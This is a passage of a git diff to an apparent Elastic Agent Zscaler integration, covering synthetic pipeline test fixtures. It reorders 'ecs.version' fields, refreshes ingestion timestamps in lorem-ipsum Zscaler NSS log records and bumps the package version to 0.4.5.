"2021-06-14T08:26:19.845262400Z" + "ingested": "2021-12-14T14:59:54.590759163Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "utodit ZSCALERNSS: time=cer Nov 1 10:16:48 2019^^timezone=PST^^action=Blocked^^reason=unknown^^hostname=ueip6097.api.host^^protocol=tcp^^serverip=10.128.43.71^^url=https://www.example.org/erit/asiarch.gif?tdolor=oremagna#siuta^^urlcategory=amnihil^^urlclass=nderit^^dlpdictionaries=ficia^^dlpengine=tru^^filetype=tionu^^threatcategory=natuser^^threatclass=olupt^^pagerisk=eprehe^^threatname=eetd^^clientpublicIP=tiumdo^^ClientIP=10.152.217.174^^location=litse^^refererURL=https://internal.example.com/nde/tNequepo.txt?end=ineavolu#ptate^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=nderitin^^user=mquiado^^event_id=ssequa^^clienttranstime=nisist^^requestmethod=temvele^^requestsize=7350^^requestversion=xeaco^^status=urm^^responsesize=114^^responseversion=porincid^^transactionsize=1150", "event": { - "ingested": "2021-06-14T08:26:19.845273500Z" + "ingested": "2021-12-14T14:59:54.590759626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "pici ZSCALERNSS: time=erit Nov 15 5:19:22 2019^^timezone=PT^^action=Blocked^^reason=success^^hostname=fugiatqu7793.www.localdomain^^protocol=ipv6-icmp^^serverip=10.26.149.221^^url=https://mail.example.org/maven/tectob.jpg?litsedd=mnis#ainci^^urlcategory=aturve^^urlclass=tiumdol^^dlpdictionaries=mporain^^dlpengine=secte^^filetype=dut^^threatcategory=aecons^^threatclass=tionemu^^pagerisk=edictasu^^threatname=quipexea^^clientpublicIP=orsit^^ClientIP=10.217.193.148^^location=tametco^^refererURL=https://api.example.com/lit/laborio.gif?mfug=acommod#mid^^useragent=Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36^^department=oloremag^^user=uisa^^event_id=umquidol^^clienttranstime=isiutali^^requestmethod=rehe^^requestsize=3382^^requestversion=adminima^^status=ipex^^responsesize=1046^^responseversion=sitvolup^^transactionsize=387", "event": { - "ingested": "2021-06-14T08:26:19.845281500Z" + "ingested": "2021-12-14T14:59:54.590760012Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agnamali ZSCALERNSS: time=ali Nov 30 12:21:57 2019^^timezone=CET^^action=Blocked^^reason=unknown^^hostname=onsequ3168.www.corp^^protocol=icmp^^serverip=10.109.192.53^^url=https://www.example.com/siarch/oloremi.htm?one=iduntutl#tNe^^urlcategory=scive^^urlclass=tcupi^^dlpdictionaries=essequam^^dlpengine=destla^^filetype=oluptat^^threatcategory=ita^^threatclass=temUte^^pagerisk=idest^^threatname=ostru^^clientpublicIP=ptassit^^ClientIP=10.172.17.6^^location=samvolup^^refererURL=https://www5.example.org/taspe/empori.txt?emporain=ovo#aeabillo^^useragent=Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90^^department=boriosa^^user=eprehen^^event_id=rehen^^clienttranstime=sitasp^^requestmethod=tassit^^requestsize=212^^requestversion=teir^^status=suntin^^responsesize=4053^^responseversion=upta^^transactionsize=1487", "event": { - "ingested": "2021-06-14T08:26:19.845292500Z" + "ingested": "2021-12-14T14:59:54.590760419Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onevol ZSCALERNSS: time=llamco Dec 14 7:24:31 2019^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=oremquel3120.internal.localhost^^protocol=ggp^^serverip=10.119.106.108^^url=https://mail.example.com/ostr/liqu.txt?niam=mullamc#umtota^^urlcategory=ssecil^^urlclass=xplic^^dlpdictionaries=isn^^dlpengine=quepor^^filetype=Lor^^threatcategory=ten^^threatclass=exeacomm^^pagerisk=cusan^^threatname=oquisq^^clientpublicIP=olli^^ClientIP=10.135.38.213^^location=tiset^^refererURL=https://mail.example.net/erspici/xercitat.jpg?Exce=uae#tut^^useragent=Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61^^department=ser^^user=ore^^event_id=iatisund^^clienttranstime=ritquii^^requestmethod=volup^^requestsize=1902^^requestversion=orsi^^status=ull^^responsesize=391^^responseversion=dolorsi^^transactionsize=7745", "event": { - "ingested": "2021-06-14T08:26:19.845299800Z" + "ingested": "2021-12-14T14:59:54.590760809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json index 1388caf7341..59a14d4009f 100644 --- a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json +++ b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-zscaler.log-expected.json @@ -1,12 +1,12 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "hello ZSCALERNSS: time=WOOT Jun 23 15:16:42 2017^^timezone=CEST^^action=\u003caction\u003e^^reason=\u003cresult\u003e^^hostname=\u003chostname\u003e^^protocol=\u003cprotocol\u003e^^serverip=\u003cdaddr\u003e^^url=\u003curl\u003e^^urlcategory=\u003cfilter\u003e^^urlclass=\u003cinfo\u003e^^dlpdictionaries=\u003cfld3\u003e^^dlpengine=\u003cfld4\u003e^^filetype=\u003cfiletype\u003e^^threatcategory=\u003ccategory\u003e^^threatclass=\u003cvendor_event_cat\u003e^^pagerisk=\u003cfld8\u003e^^threatname=\u003cthreat_name\u003e^^clientpublicIP=\u003cfld9\u003e^^ClientIP=\u003csaddr\u003e^^location=\u003cfld11\u003e^^refererURL=\u003cweb_referer\u003e^^useragent=\u003cuser_agent\u003e^^department=\u003cuser_dept\u003e^^user=\u003cusername\u003e^^event_id=\u003cid\u003e^^clienttranstime=\u003cfld17\u003e^^requestmethod=\u003cweb_method\u003e^^requestsize=\u003csbytes\u003e^^requestversion=\u003cfld20\u003e^^status=\u003cresultcode\u003e^^responsesize=\u003crbytes\u003e^^responseversion=\u003cfld23\u003e^^transactionsize=\u003cbytes\u003e", "event": { - "ingested": "2021-06-14T08:26:20.438011500Z" + "ingested": "2021-12-14T14:59:56.254697507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/zscaler/manifest.yml b/packages/zscaler/manifest.yml index ece330f8aa8..4a3e4ceb6c0 100644 --- a/packages/zscaler/manifest.yml +++ b/packages/zscaler/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: zscaler title: Zscaler NSS Logs -version: 0.4.4 +version: 0.4.5 description: Collect and parse logs from Zscaler devices with Elastic Agent. categories: ["network", "security"] release: experimental